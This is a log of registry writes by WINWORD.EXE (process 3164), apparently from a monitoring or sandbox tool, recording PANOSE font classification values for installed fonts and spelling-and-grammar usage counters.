HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU-ExtB
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU-ExtB
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
PMingLiU-ExtB
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@PMingLiU-ExtB
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MingLiU_HKSCS-ExtB
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MingLiU_HKSCS-ExtB
02020500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mongolian Baiti
03000500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Gothic
020B0609070205080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PGothic
020B0600070205080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PGothic
020B0600070205080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS UI Gothic
020B0600070205080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS UI Gothic
020B0600070205080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS Mincho
02020609040205080304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS PMincho
02020600040205080304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@MS PMincho
02020600040205080304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MV Boli
02000500030200090000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft New Tai Lue
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Nyala
02000504070300020003
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft PhagsPa
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Plantagenet Cherokee
02020602070100000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Script
020B0504020000000003
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Semibold
020B0702040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Light
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe UI Symbol
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun
02010600030101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
NSimSun
02010609030101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@NSimSun
02010609030101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
SimSun-ExtB
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimSun-ExtB
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Tai Le
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Shonar Bangla
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Yi Baiti
03000500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Sans Serif
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aparajita
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ebrima
02000000000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gisha
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kokila
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Leelawadee
020B0502040204020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Microsoft Uighur
02000000000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MoolBoran
020B0100010101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Utsaah
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vijaya
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Andalus
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arabic Typesetting
03020402040406030203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Simplified Arabic Fixed
02070309020205020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Sakkal Majalla
02000000000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Traditional Arabic
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Aharoni
02010803020104030203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
David
020E0502060401010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FrankRuehl
020E0503060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Levenim MT
02010502060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam
020B0502050101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Miriam Fixed
020B0509050101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Narkisim
020E0502050101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rod
02030509050101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FangSong
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@FangSong
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@SimHei
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KaiTi
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@KaiTi
02010609060101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
AngsanaUPC
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Browallia New
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
BrowalliaUPC
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
CordiaUPC
020B0304020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DilleniaUPC
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
EucrosiaUPC
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
FreesiaUPC
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
IrisUPC
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
JasmineUPC
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
KodchiangUPC
02020603050405020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
LilyUPC
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
DFKai-SB
03000509000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@DFKai-SB
03000509000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Unicode
020B0602030504020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Black
020B0A04020102020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Candara
020E0502030303020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Comic Sans MS
030F0702030302020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Consolas
020B0609020204030204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Constantia
02030602050306030303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Corbel
020B0503020204020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium
020B0603020102020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gabriola
04040605051002020D02
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Georgia
02040502050405020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palatino Linotype
02040502050505030304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Segoe Print
02000600000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Trebuchet MS
020B0603020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Verdana
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Webdings
05030102010509060703
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MT Extra
05050102010205020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
@Arial Unicode MS
020B0604020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 2
05020102010507070707
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wingdings 3
05040102010807070707
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Book Antiqua
02040602050305030304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Gothic
020B0502020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Haettenschweiler
020B0706040902060204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Outlook
05010100010000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Narrow
020B0606020202030204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Garamond
02020404030301010803
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Monotype Corsiva
03010101010201010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Algerian
04020705040A02060702
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Baskerville Old Face
02020602080505020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bauhaus 93
04030905020B02020C02
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bell MT
02020503060305020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB
020E0602020502020306
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bernard MT Condensed
02050806060905020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Poster Compressed
02070706080601050204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Britannic Bold
020B0903060703020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Broadway
04040905080B02020502
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Brush Script MT
03060802040406070304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Californian FB
0207040306080B030204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Centaur
02030504050205020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Chiller
04020404031007020602
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Colonna MT
04020805060202030203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Cooper Black
0208090404030B020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Footlight MT Light
0204060206030A020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Freestyle Script
030804020302050B0404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harlow Solid Italic
04030604020F02020D02
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Harrington
04040505050A02020702
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
High Tower Text
02040502050506030303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Jokerman
04090605060D06020702
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Juice ITC
04040403040A02020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kristen ITC
03050502040202030202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Kunstler Script
030304020206070D0D06
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Bright
02040602050505020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Calligraphy
03010101010101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Fax
02060602050505020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Handwriting
03010101010101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Magneto
04030805050802020D02
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Matura MT Script Capitals
03020802060602070202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Mistral
03090702030407020403
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Modern No. 20
02070704070505020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Engraved
04020502070703030202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Niagara Solid
04020502070702020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Old English Text MT
03040902040508030806
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Onyx
04050602080702020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Parchment
03040602040708040804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Playbill
040506030A0602020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Poor Richard
02080502050505020702
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Ravie
04040805050809020602
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Informal Roman
030604020304060B0204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Showcard Gothic
04020904020102020604
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Snap ITC
04040A07060A02020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Stencil
040409050D0802020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tempus Sans ITC
04020404030D07020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Viner Hand ITC
03070502030502020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vivaldi
03020602050506090804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Vladimir Script
03050402040407070305
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Wide Latin
020A0A07050505020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT
020B0602020104020603
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed
020B0606020104020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Script MT Bold
03040602040607080904
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Extra Bold
02060903040505020403
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell Condensed
02060603050405020104
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rockwell
02060603020205020403
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Rage Italic
03070502040507070304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Pristina
03060402040406080204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua Titling MT
02020502060505020804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Perpetua
02020502060401020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Papyrus
03070502060502030205
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Palace Script MT
030303020206070C0B05
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
OCR A Extended
02010509020102010303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Maiandra GD
020E0502030308020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans Typewriter
020B0509030504030204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Lucida Sans
020B0602030504020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Imprint MT Shadow
04020605060303030202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Stout
0202090407030B020401
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Goudy Old Style
02020502050305020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gloucester MT Extra Condensed
02030808020601010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold Condensed
020B0A06020104020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans Ultra Bold
020B0A02020104020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Condensed
020B0506020104020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT
020B0502020104020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gill Sans MT Ext Condensed Bold
020B0902020104020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Gigi
04040504061007020D02
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
French Script MT
03020402040607040605
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Medium Cond
020B0606030402020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Heavy
020B0903020102020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi Cond
020B0706030402020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Demi
020B0703020102020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Franklin Gothic Book
020B0503020102020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Forte
03060902040502070203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Felix Titling
04060505060202020A04
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Medium ITC
020B0602030504020804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Light ITC
020B0402030504020804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Demi ITC
020B0805030504020804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Eras Bold ITC
020B0907030504020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Engravers MT
02090707080505020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Elephant
02020904090505020303
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Edwardian Script ITC
030303020407070D0804
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Curlz MT
04040404050702020202
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Light
020E0507020206020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Copperplate Gothic Bold
020E0705020206020404
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Century Schoolbook
02040604050505020304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Castellar
020A0402060406010301
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Calisto MT
02040603050505030304
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bradley Hand ITC
03070402050302030203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookman Old Style
02050604050505020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Condensed
02070606080606020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT Black
02070A03080606020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bodoni MT
02070603080606020203
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Blackadder ITC
04020505051007020D02
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Arial Rounded MT Bold
020F0704030504030204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Agency FB
020B0503020202020204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Bookshelf Symbol 7
05010101010101010101
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Sans Serif
020B0604030504040204
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
MS Reference Specialty
05000500000000000000
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Berlin Sans FB Demi
020E0802020502020306
3164
WINWORD.EXE
write
HKEY_CURRENT_USER\Software\Microsoft\Shared Tools\Panose
Tw Cen MT Condensed Extra Bold
020B0803020202020204
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1326252073
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1326252074
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1326252073
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
1326252074
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252094
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
1326252095
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1326252075
3164
WINWORD.EXE
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
1326252076
3164
WINWORD.EXE
write
